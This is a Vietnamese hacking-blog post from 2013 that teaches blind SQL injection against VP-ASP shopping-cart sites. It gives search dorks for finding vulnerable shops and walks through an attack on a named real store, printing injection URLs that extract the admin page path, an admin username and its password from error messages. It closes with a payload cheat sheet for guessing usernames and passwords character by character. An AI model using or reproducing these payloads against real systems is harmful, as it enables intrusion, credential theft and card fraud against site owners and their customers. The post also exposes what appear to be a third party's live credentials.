My Banner
Link Sahabat
Forum
- local attack (1)
- new (1)
- sql injection (36)
- tài liệu IT (1)
- Trick Blogger (1)
- Trick facebook (9)
Benner Friends
abc
Blog Archive
-
▼
2013
(50)
-
▼
tháng 12
(36)
- tut 406
- tut ko có use và admin
- tut check sql sài lệnh mid 100,1000(sql nang cao)
- tut xpath (sql nang cao)
- tut thêm =-1148952776'
- tut SQL injection dạng HTML
- Một số cách kiếm acc facebook
- Hướng dẫn cách lấy toàn bộ bài viết từ blog khác
- các lệnh local
- Khai thác Error Based - Quick Blind
- MỘT SỐ LƯU Ý KHI KHAI THÁC SQL
- các dạng tut check sql
- Một số cách Bypass SQL injection
- [TUT] Hack SQLi Injection Căn Bản Cho NewBie
- [TUT] Hack SQLi Injection Căn Bản Cho NewBie
- Từ dễ đến khó "Bypass WAF"
- [TUT] Bypass Filter + 403 Forbidden SQL Injection
- Advanced - Jet SQL
- Advanced - Blind SQL
- Advanced - Blind SQL
- Advanced - Group by,Order by,Limit
- Advanced - Bypass SQL injection
- Advanced - Bypass SQL injection
- Advanced - Blind SQL
- Advanced - MySQL Blind SQL Cheat Sheets
- Basic - MySQL injection
- Basic - lỗi SQL id=?' cat=?' - part 2
- Basic - lỗi SQL id=?' cat=?' Tìm Shop lỗi
- Basic - lỗi SQL id=?' cat=?' Tìm Shop lỗi
- Basic - Unable to run Query
- tut hướng dẫn check sql bang html
- tổng hợp các link hack site
- Tut SQL Base64 encode/decode
- TUT ko co user va admin tim kiem member
- --------------error base------------
- tut tb_user
-
▼
tháng 12
(36)
Được tạo bởi Blogger.
Translate
Chủ Nhật, 22 tháng 12, 2013
Advanced - Blind SQL
VD: tìm link admin thì các bạn phải tìm từng chữ trong chuỗi Database về link admin và ghép chúng lại thành 1 chuỗi. Nói nhiều các bạn rối thôi làm liền cho chắc dễ hiểu. Chuẩn bị : – Trình duyệt Web Opera, Mozila Firefor v1.3 hoặc loại khác Internet Explorer là ok. Không nên xài Internet Explorer để Hack (^|^) – 1 ly nước và 1 cái khăn lau mặt để chữa cháy & lau mồ hôi. Mục tiêu: – Tất cả các Phiên bản từ 5.0 trở về trước của VP-ASP (loại shop tương đối nhiều lỗi và nhiều cc chết (^|^)) – Các Tìm những Shop VP-ASP này thì có thể tham khỏa những từ khóa bên dưới dùng cho việc search trên Google, Yahoo … một site tìm kiếm bất kì nào đó. – Từ Khóa : + shopdisplayproducts.asp?id + shopaddtocart.asp?catalogid= – Tôi chỉ đưa ra 2 từ khóa đó bởi vì nó là những mục tiêu chính giúp 1 trang tìm kiếm có thể tìm ra được VP-ASP.
Chúng ta bắt đâu hack 1 site demo nha Mục tiêu là
https://circleathletics.com/ (sử dụng VP-ASP V5.0) – đầu tiên chúng ta tìm link admin của site này –
https://circleathletics.com/shop/sho…01=(select%20f ieldname%20from%20configuration%20where%20left(fie ldname,10)=’xadminpage’%20and%20left(fieldvalu e,1) =’a’)
Microsoft VBScript runtime error ‘800a000d’ Type mismatch: ‘clng’ /shop/shopproductfeatures.asp, line 139 Như vậy có nghĩa là từ khóa chúng ta đưa ra (a) không phải là ký tự đâu tiên trong chuỗi link admin, chúng ta chợt suy nghĩ đên link admin thường là shopadmin.asp … thử với câu lênh sau thay chữ
a = s -
https://circleathletics.com/shop/sho…01=(select%20f ieldname%20from%20configuration%20where%20left(fie ldname,10)=’xadminpage’%20and%20left(fieldvalu e,1) =’s’)
Microsoft OLE DB Provider for SQL Server error ‘80040e07′ Syntax error converting the varchar value ‘xadminpage’ to a column of data type int.
/shop/shop$db.asp, line 409 – Chính xác là chữ S là ký tự đâu tien của link admin rồi, chúng ta tiếp tục thế những chữ khác và tiếp theo
https://circleathletics.com/shop/sho…01=(select%20f ieldname%20from%20configuration%20where%20left(fie ldname,10)=’xadminpage’%20and%20left(fieldvalu e,2) =’sh’) – Chú ý chỗ này nha (fieldvalue,2)=’sh’) – Cú tiếp tục thay tiếp vào đê tìm ra link admin. Link admin kết thúc = .asp nên không cần tìm xem chuỗi ký tự có bao nhiêu ký tự đâu Tiếp theo chúng ta tìm user + pass admin
https://circleathletics.com/shop/sho…01=(select%20f ldusername%20from%20tbluser%20where%20admintype=�� �s uper’%20and%20left(fldusername,1)=’a’)
Microsoft VBScript runtime error ‘800a000d’ Type mismatch: ‘clng’
/shop/shopproductfeatures.asp, line 139 Ko có gì hết tiếp tục như thế
https://circleathletics.com/shop/sho…01=(select%20f ldusername%20from%20tbluser%20where%20admintype=�� �s uper’%20and%20left(fldusername,1)=’c’)
Microsoft OLE DB Provider for SQL Server error ‘80040e07′ Syntax error converting the varchar value ‘circ54′ to a column of data type int. /shop/shop$db.asp, line 409 Hiện luôn User ra luôn site này bị lỗi nặng nếu những site khác các bạn động não 1 tí như khi tìm link admin là ok hihi.
https://circleathletics.com/shop/sho…01=(select%20f
ldusername%20from%20tbluser%20where%20admintype=�� �s uper’%20and%20left(fldusername,2)=’ab’) đây là cách tìm ký tự thư 2 , thứ 3 thì them vào (fldusername,3)=’abc’) dậy đó dễ mà. Chúng ta đã có user admin ở trên rồi circ54 tìm pass của nó
https://circleathletics.com/shop/sho…01=(select%20f ldpassword%20from%20tbluser%20where%20fldusername= ‘circ54′%20and%20left(fldpassword,1)=’a’)
Microsoft VBScript runtime error ‘800a000d’ Type mismatch: ‘clng’ /shop/shopproductfeatures.asp, line 13
https://circleathletics.com/shop/sho…01=(select%20f ldpassword%20from%20tbluser%20where%20fldusername= ‘circ54′%20and%20left(fldpassword,1)=’2′)
Microsoft OLE DB Provider for SQL Server error ‘80040e07′ Syntax error converting the varchar value ‘2005HCP’ to a column of data type int. /shop/shop$db.asp, line 409 Vậy là đã hack được thằng này rồi hihi quá dễ phải không các bạn Hy vọng các bạn hiểu mình viết vụng lắm mong mọi người thông cảm Còn đây là 1 số tham khỏa them
*************(*** Ti`m link admin ***************************************
%20or%201=(select%20fieldname%20from%20configurati on%20where%20left(fieldname,10)=’xadminpage’%2 0and %20left(fieldvalue,1)=’a’) <=== Doan ki tu dau %20or%201=(select%20fieldname%20from%20configurati on%20where%20left(fieldname,10)=’xadminpage’%2 0and %20left(fieldvalue,1)=’a’%20and%20len(fieldval ue)= 15) <=== Tim so ki tu .
**************** Ti`m user ***********************************************
%20or 1=(select fldusername from tbluser where admintype=’super’ and left(fldusername,1)=’a’) <== Ki tu dau %20or 1=(select fldusername from tbluser where admintype=’super’ and left(fldusername,2)=’ab’) <== Tim chu~ thu 2 – thu 3 thi the = so 3 va mo` tiep %20or 1=(select fldusername from tbluser where left(fldusername,1)=’b’ and len(fldusername)=3) <== So ki tu cua user o%20r 1=(select fldusername from tbluser where left(fldusername,1)=’a’) When not superAdmin
*************** Ti`m pass ************************************************
%20or 1=(select fldpassword from tbluser where fldusername=’blue42jh’ and left(fldpassword,1)=’a’) <== Ki tu dau %20or 1=(select fldpassword from tbluser where left(fldpassword,1)=’b’ and len(fldpassword)=3) <== So ki tu
Nhãn:
sql injection
Đăng ký:
Đăng Nhận xét (Atom)
Giới thiệu bản thân
Join My Group
webcom
Translators
Statistik
Follow
noo
no
Gunakan Google Chrome Untuk Mendapatkan Tampilan Terbaik Blog Ini ( ^_^ )